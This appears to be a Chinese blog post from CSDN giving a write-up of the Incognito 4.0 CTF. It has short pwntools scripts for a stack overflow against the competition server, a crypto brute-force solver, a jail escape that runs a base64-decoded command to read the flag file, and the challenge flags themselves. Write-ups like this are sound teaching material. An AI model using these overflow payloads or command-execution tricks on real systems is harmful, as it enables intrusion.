Incognito 4.0 CTF Write Up

已于 2023-02-19 09:25:19 修改
阅读量133 收藏
点赞数
分类专栏: Write Up 文章标签: 网络安全 安全 密码学
于 2023-02-19 09:22:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g0at_sec/article/details/129107527
版权

Incognito 4.0

Web

1. get flag 1

[http://0.0.0.0:9001/flag.txt
1676715182889.png

2. get flag 2

http://[::]:9001/flag.txt
1676715283910.png

Pwn

1. babyFlow

from pwn import *

p = remote('143.198.219.171',5000)
p.recv()
g = (0x14+4)*'a'+p32(0x80491fc)
p.sendline(g)
p.interactive()

#ictf{bf930bcd-6c10-4c05-bdd8-435db4b50cdb}

2. Gainme

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
p  = remote('143.198.219.171',5003)
p.recvline()
p.recvuntil('Level 0:')
p.sendline("ICTF4")
p.recvuntil('Level 1:')
p.sendline('dasDASQWgjtrkodsc')
p.recvuntil('Level 2:')
p.sendline(p64(0xDEADBEEF))
p.recvuntil('Level 3:')
p.sendline('1')
p.interactive()

#ictf{g@inm3-sf23f-4fd2150cd33db}

Reverse

1. Meow

data=open("Meow","rb").read()
print(data[1::2].decode(errors='ignore'))

#ictf{easiest_challenge_of_them_all}

Crypto

1. Ancient

下载的图片需要手动加png文件头

https://jsom1.github.io/_challenges/templed

在这里插入图片描述

一个比赛原题
手动对着表转一下就行
在这里插入图片描述

2. Crypto1

with open("result", 'r', encoding='utf-8') as f:
    cy = f.read()
print(cy)
print(len(cy))

def func(f, i):
    if i<5:
        out = ord(f) ^ 0x76 ^ 0xAD
        var1 = (out & 0xAA) >> 1
        var2 = 2 * out & 0xAA
        return var1 | var2 
    elif i>=5 and i<10:
        out = ord(f) ^ 0x76 ^ 0xBE
        var1 = (out & 0xCC) >> 2
        var2 = 4 * out & 0xCC
        return var1 | var2
    else:
        out = ord(f) ^ 0x76 ^ 0xEF
        var1 = (out & 0xF0) >> 4
        var2 = 16 * out & 0xF0
        return var1 | var2

dic = {}
flag = ''
for i in range(15):
    for j in range(128):
        t = chr(func(chr(j), i))
        if t==cy[i]:
            print(i, chr(j), j)
            flag += chr(j)
            break

print(flag)

#ictf{88f30d1cd1ab443}

TheOnlyJail

1. TheOnlyJail

import os
import base64

os.system(b64.base64decode("some_base64_encoded_command_like_cat /home/ctf/flag.txt"))
_g0at_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 546
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
笔记,后期整理
weixin_30278237的博客
08-06 7994
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
Incognito CTF 3.0部分WP及赛后复现
qq_45862635的博客
04-26 500
Incognito CTF 3.0部分WP及赛后复现,剩下的有时间继续复现
Sqlmap中文手册详解
酒醉浮生的博客
11-13 2556
一、Sqlmap是什么 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间...
权限提升总结
Christ1na的博客
03-07 6051
提权 内网
Linux(CentOS)下,各种协议,端口号
山不在高,有金则名
07-16 7万+
DNS:/etc/resolv.conf 主机名:/etc/sysconfig/network 私有主机名:/etc/hosts 网卡配置文件存放目录:/etc/sysconfig/network-scripts/ IP/NetMask/Gateway等:/etc/sysconfig/network-scripts/ifcfg-em1 网络协议(IP):/etc/protocols 网
linux 下各个端口及他们的作用
kiwi的专栏
07-28 5万+
# /etc/services: # $Id: services,v 1.48 2009/11/11 14:32:31 ovasik Exp $ # # Network services, Internet style # IANA services version: last updated 2009-11-10 # # Note that it is presently the p
222
04-24 4万+
# /etc/services:# $Id: services,v 1.48 2009/11/11 14:32:31 ovasik Exp $## Network services, Internet style# IANA services version: last updated 2009-11-10## Note that it is presently the policy of IAN
常用端口总结
热门推荐
u014182755的专栏
06-11 12万+
TCP和UDP采用16bit的端口浩来识别应用程序。那么常用的知名端口号有哪些呢?
Incognito-2.0-CTF-Write-Ups
04-19
简单登录 ( ) 暗示
go-incognito:隐身
05-01
隐身:安全性,隐私权和匿名性指南 Go Incognito是一个基于视频的课程,向用户介绍有关隐私,安全性和匿名性的不同经验级别。 这是Techlore任务的核心部分,目的是教育用户并转变他们对为什么,何时,何时以及如何...
newpages_incognito.zip
08-27
支持自动重装其系统备份c盘
newpages_incognito
05-29
newpages_incognito
Search Incognito-crx插件
03-19
通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search Incognito,可以使您的搜索保持私密。 大公司会跟踪您的搜索并在Internet上关注您。通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数字时代网络安全即服务的兴起
网络研究观
06-11 540
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 192
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 939
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
option.add_argument('--incognito')
06-10
option.add_argument('--incognito')是Chrome浏览器的一个启动参数,用于启动浏览器的隐身模式。 在隐身模式下,Chrome浏览器不会保存用户的浏览记录、cookie、表单数据等信息,用户在隐身模式下的浏览行为不会被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值